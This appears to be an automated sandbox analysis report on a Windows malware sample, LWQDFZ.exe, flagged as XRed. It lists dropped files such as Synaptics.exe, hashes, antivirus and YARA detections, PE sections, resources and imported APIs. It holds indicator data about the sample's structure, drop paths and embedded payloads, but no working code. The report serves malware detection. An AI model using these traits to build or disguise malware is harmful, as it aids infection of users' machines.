                                                                                                                    SSDEEP:24576:KhloDX0XOf4ei4nfi5aPeIL2UkQwaeQnKzHZRdb:KhloJf5fj22pkXaxM
                                                                                                                    MD5:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    SHA1:ED39E0A9AA016595F1EAD34C221CE0B878E7CF64
                                                                                                                    SHA-256:0A438A59E23472911FD3E08A50F58CAD8008D01733A1159BB20B06B20B21AAC0
                                                                                                                    SHA-512:DA7965709ADED6570C282E02536E2FCDF51E6A42CED919ADF75BE4FB694017BCD332C229DB4B07684265B471DF6D2001D62A1C5327CD93F35520FF4FAD83E086
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...O.hg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):914944
                                                                                                                    Entropy (8bit):7.8688917212806055
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:KhloDX0XOf4ei4nfi5aPeIL2UkQwaeQnKzHZRdb:KhloJf5fj22pkXaxM
                                                                                                                    MD5:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    SHA1:ED39E0A9AA016595F1EAD34C221CE0B878E7CF64
                                                                                                                    SHA-256:0A438A59E23472911FD3E08A50F58CAD8008D01733A1159BB20B06B20B21AAC0
                                                                                                                    SHA-512:DA7965709ADED6570C282E02536E2FCDF51E6A42CED919ADF75BE4FB694017BCD332C229DB4B07684265B471DF6D2001D62A1C5327CD93F35520FF4FAD83E086
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...O.hg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):165
                                                                                                                    Entropy (8bit):1.3520167401771568
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                                    MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                                    SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                                    SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                                    SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                                    Malicious:false
                                                                                                                    Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):771584
                                                                                                                    Entropy (8bit):6.632118854531729
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                    MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                    SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                    SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.394167916772136
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:sl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNASOBSqa:k4vF0MYQUMM6VFYSSU
                                                                                                                    MD5:498A12F65D0B58058EB8C2E0ABACBFD9
                                                                                                                    SHA1:590A338042A94D3F8F2F172E47CAE66359DDDF21
                                                                                                                    SHA-256:EE715FCB98740A04842B5A53511C182BBADB7022ABCE68FA924376447D39ADA7
                                                                                                                    SHA-512:BC5E10AD5711AE305DBF07C950647F1990DE748BD74ED0B944463E5007D49DC2E9E82EA6F8EF5A05CF63EE13009EAA722776F64328BF75ADAF8B2731D5B2889E
                                                                                                                    Malicious:false
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.462560448742017
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                    • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                    • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                    • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                    • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                    File name:LWQDFZ.exe
                                                                                                                    File size:1'686'528 bytes
                                                                                                                    MD5:27bcc0d927e9f13250b1dff9e122e9af
                                                                                                                    SHA1:2f9f09f46fe7ee2a495247292b3f2be0777c2873
                                                                                                                    SHA256:71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1
                                                                                                                    SHA512:1bdf5d3ba61b8d99955b92b87377fcbea08db248aae1089a9028a0613eb06c43e330bd781edf66ec955b1042c811094207b8962e391b37fc516a4b93664c7653
                                                                                                                    SSDEEP:49152:cnsHyjtk2MYC5GDchloJf5fj22pkXaxMa:cnsmtk2alhlyLZ
                                                                                                                    TLSH:A575C02EB1918437D137D6F84F5BB294482BBFF12F25694A3BE83E4C4E392712855293
                                                                                                                    Icon Hash:0759fdf4f859738f
                                                                                                                    Entrypoint:0x49ab80
                                                                                                                    Entrypoint Section:CODE
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                    DLL Characteristics:
                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                    Instruction
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    add esp, FFFFFFF0h
                                                                                                                    mov eax, 0049A778h
                                                                                                                    call 00007FD770C0A11Dh
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007FD770C5DA65h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, 0049ABE0h
                                                                                                                    call 00007FD770C5D664h
                                                                                                                    mov ecx, dword ptr [0049DBDCh]
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, dword ptr [00496590h]
                                                                                                                    call 00007FD770C5DA54h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007FD770C5DAC8h
                                                                                                                    call 00007FD770C07BFBh
                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0xf1330 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0xf1330 | 0xf1400 | c51e0c30e46396d53fc764e9203de990 | False | 0.8937469640544041 | data | 7.778177022487087 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.1472795497185741
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6
RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5
RT_RCDATA | 0xb8e14 | 0xdf600 | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed | | | 0.925556099608282
RT_RCDATA | 0x198414 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0x198418 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0x19c018 | 0x64c | data | | | 0.5998759305210918
RT_RCDATA | 0x19c664 | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309
RT_RCDATA | 0x19c7b8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0x1a0f8c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x1a0fa0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x1a0fb4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a0fc8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a0fdc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a0ff0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a1004 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x1a1018 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x1a102c | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                    ole32.dllCLSIDFromString
                                                                                                                    kernel32.dllSleep
                                                                                                                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                    ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                    oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                    comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                    shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                    wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                    shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                    advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                    wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                    netapi32.dllNetbios
Language of compilation system | Country where language is spoken
